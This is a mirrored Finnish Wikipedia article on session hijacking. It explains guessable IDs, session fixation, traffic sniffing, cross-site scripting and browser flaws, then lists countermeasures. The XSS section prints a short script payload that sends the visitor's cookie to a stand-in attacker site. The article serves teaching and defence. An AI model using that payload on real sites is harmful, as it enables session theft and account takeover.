Ebooks, Audobooks and Classical Music from Liber Liber
a b c d e f g h i j k l m n o p q r s t u v w x y z





Web - Amazon

We provide Linux to the World


We support WINRAR [What is this] - [Download .exe file(s) for Windows]

CLASSICISTRANIERI HOME PAGE - YOUTUBE CHANNEL
SITEMAP
Audiobooks by Valerio Di Stefano: Single Download - Complete Download [TAR] [WIM] [ZIP] [RAR] - Alphabetical Download  [TAR] [WIM] [ZIP] [RAR] - Download Instructions

Make a donation: IBAN: IT36M0708677020000000008016 - BIC/SWIFT:  ICRAITRRU60 - VALERIO DI STEFANO or
Privacy Policy Cookie Policy Terms and Conditions
Istuntokaappaus – Wikipedia

Istuntokaappaus

Wikipedia

Istuntokaappaus on metodi, jota käytetään palvelinohjelmia sisältäville web-sivustoille murtautumiseen. Istunnon kaappaaminen tarkoittaa, että hyökkääjä esiintyy toisena käyttäjänä käyttämällä tämän istuntotunnistetta. Web-sivusto erehtyy tällöin pitämään hyökkääjää luvallisena käyttäjänä ja antaa tämän käyttää sivustoa toisen käyttäjän oikeuksin. Kts. Mies välissä -hyökkäys

Sisällysluettelo

[muokkaa] Erilaisia tapoja kaapata istunto

[muokkaa] Istuntotunnisteen arvaaminen

Joissakin palveluissa istuntotunnisteet ovat ennalta arvattavia. Istuntotunniste saattaa esimerkiksi koostua käyttäjän kirjautumisnimestä ja/tai aikaleimasta sekä satunnaisluvusta. Tällainen istuntotunniste on helppo arvata tarkoitusta varten tehdyllä ohjelmistolla. Siksi onkin suositeltavaa käyttää käytetyn web-ohjelmointikielen sisäistä istunnonhallintaa, joka on yleensä turvallisempi.

[muokkaa] Istuntotunnisteen määrääminen

Joskus hyökkääjä voi itse määrätä käyttäjän istuntotunnisteen vihamielisellä linkillä. Mikäli istuntotunnistetta siirretään sivulta toiselle sivun URL-osoitteen mukana, saattaa hyökkääjä tehdä sivustolle linkin, johon hän liittää haluamansa istuntotunnisteen. Käyttäjän klikattua linkkiä, hän siirtyy sivustolle ja hänen istuntotunnisteekseen asetetaan hyökkääjän määrittämä tunnus. Jos käyttäjä kirjautuu sisään palveluun, voi hyökkääjä käyttää tämän istuntotunnusta. Web-sivusto luulee, että hyökkääjä on kirjautunut käyttäjä.

[muokkaa] Verkon kuuntelu

Langattomissa lähiverkoissa ja keskitinverkoissa hyökkääjän on mahdollista lukea toisille tietokoneille tarkoitettua viestiliikennettä, mikäli sitä ei ole salattu. Hyökkääjä voi etsiä toisen käyttäjän istuntotunnisteen tämän verkkoliikenteen seasta ja ottaa sen käyttöönsä.

[muokkaa] Vihamielisen koodin liittäminen

Joillakin sivustoilla käyttäjän antamia tietoja ei puhdisteta kunnolla. Hyökkääjän on silloin mahdollista liittää web-sivulle haluamiaan komentoja skriptikieltä käyttäen. Hän saattaisi vaikkapa kirjoittaa keskustelupalstalle viestin, joka sisältää seuraavan koodin:

<script type="text/javascript">
window.location = "http://www.hakkerinsivu.net/sivu.php?evaste=" + document.cookie;
</script>

Tämä melko viattoman näköinen koodi lähettää käyttäjän hakkerin tiedokeräyssivuille mukanaan sivuun liittyvän evästeen sisältö. Koska istuntotunniste pidetään yleensä evästeessä, saa hyökkääjä sen tietoonsa.

[muokkaa] Selainten tietoturva-aukot

Joskus selaimissa esiintyy tietoturva-aukkoja, jotka sallivat web-sivuston lukea toisen web-sivuston evästeitä. Koska istuntotunniste pidetään yleensä evästeessä, saa hyökkääjä sen tietoonsa.

[muokkaa] Istuntokaappauksilta suojautuminen

Istuntokaappauksilta voi suojautua monin tavoin.

[muokkaa] Salaus

Tietoliikenteen salaaminen on suositeltavaa aina, kun verkon yli siirretään luottamuksellista tietoa. Istuntotunnisteet ja salasanat tulisi aina siirtää salattua yhteyttä pitkin. Usein salauksen käyttö ei kuitenkaan ole mahdollista resurssisyistä.

[muokkaa] IP-osoitteen tai muun tiedon toistuvuuden varmennus

Istunnon alussa voidaan tallentaa käyttäjän IP-osoite tai muu käyttäjän selaimen lähettämä tieto palvelimelle. Aina sivua ladattaessa voidaan verrata käyttäjän lähettämää tietoa aiemmin tallennettuun tietoon. Jos tieto on muuttunut, siitä voidaan päätellä että käyttäjä ei ole sama kuin alkuperäinen.

Tämä metodi ei kutenkaan ole täysin ogelmaton. Käyttäjän IP-osoite saattaa vaihdella jokaisella latauskerralla, mikäli tämän internet-operaattori on näin määrittänyt. Toisaalta käyttäjän IP tai mikä tahansa muu selaintieto on mahdollista väärentää. Lisäksi, mikäli hyökkääjä ja käyttäjä ovat saman välityspalvelimen takana, heidän IP-osoitteensa näyttää samalta.

[muokkaa] Istuntotunnuksen vaihtaminen kirjauduttaessa

Istuntotunnus tulisi aina vaihtaa kirjauduttaessa palveluun. Näin istuntotunnuksen määrääminen ennalta hyökkääjän luomalla linkillä ei enää onnistuisi. Mikäli nykyiset istuntomuuttujat halutaan säilyttää, tulisi ne siirtää uuteen istuntoon ja tuhota ne vanhasta.

[muokkaa] Ohjelmistojen päivittäminen

Selainten päivittäminen on tärkeää, jotta hyökkääjä ei voisi murtautua sivustolle sinun tunnuksillasi.

[muokkaa] Ohjelmointikielen sisäisen istunnonhallinnan käyttö

On suositeltavaa käyttää ohjelmointikielen sisäistä istunnonhallintaa, jos sellainen on saatavilla. Yleensä ohjelmointikielen sisäinen toetutus on turvallisempi. Jaetuilla palvelimilla ohjelmointikielen istunnonhallinta saattaa kuitenkin olla vaarallinen, jos web-sivustojen on mahdollista lukea istuntomuuttujien säilytyskansion tiedostoja. Tällöin toinen sivusto voi lukea sivusi istuntomuuttujia.

[muokkaa] Käyttäjän syötteen puhdistaminen

Käyttäjä ei koskaan saisi liittää html-koodia sivulle suoraan. Myös linkkien url-osoitteet tulisi tarkistaa, jotta ne eivät sisällä vihamielistä koodia. Jos sivustolla on esimerkiksi vieraskirja, saattaa hyökkääjä kirjoittaa www-osoite-kenttään scriptikoodia aloittamalla sen tekstillä "javascript:", tai lisätä siihen sitaatin, jonka jälkeen linkkiin on mahdollista liittää esimerkiksi skriptien tapahtumankäsittelijöitä.

Haettu osoitteesta http://fi.wikipedia.org../../../i/s/t/Istuntokaappaus.html
Our "Network":

Project Gutenberg
https://gutenberg.classicistranieri.com

Encyclopaedia Britannica 1911
https://encyclopaediabritannica.classicistranieri.com

Librivox Audiobooks
https://librivox.classicistranieri.com

Linux Distributions
https://old.classicistranieri.com

Magnatune (MP3 Music)
https://magnatune.classicistranieri.com

Static Wikipedia (June 2008)
https://wikipedia.classicistranieri.com

Static Wikipedia (March 2008)
https://wikipedia2007.classicistranieri.com/mar2008/

Static Wikipedia (2007)
https://wikipedia2007.classicistranieri.com

Static Wikipedia (2006)
https://wikipedia2006.classicistranieri.com

Liber Liber
https://liberliber.classicistranieri.com

ZIM Files for Kiwix
https://zim.classicistranieri.com


Other Websites:

Bach - Goldberg Variations
https://www.goldbergvariations.org

Lazarillo de Tormes
https://www.lazarillodetormes.org

Madame Bovary
https://www.madamebovary.org

Il Fu Mattia Pascal
https://www.mattiapascal.it

The Voice in the Desert
https://www.thevoiceinthedesert.org

Confessione d'un amore fascista
https://www.amorefascista.it

Malinverno
https://www.malinverno.org

Debito formativo
https://www.debitoformativo.it

Adina Spire
https://www.adinaspire.com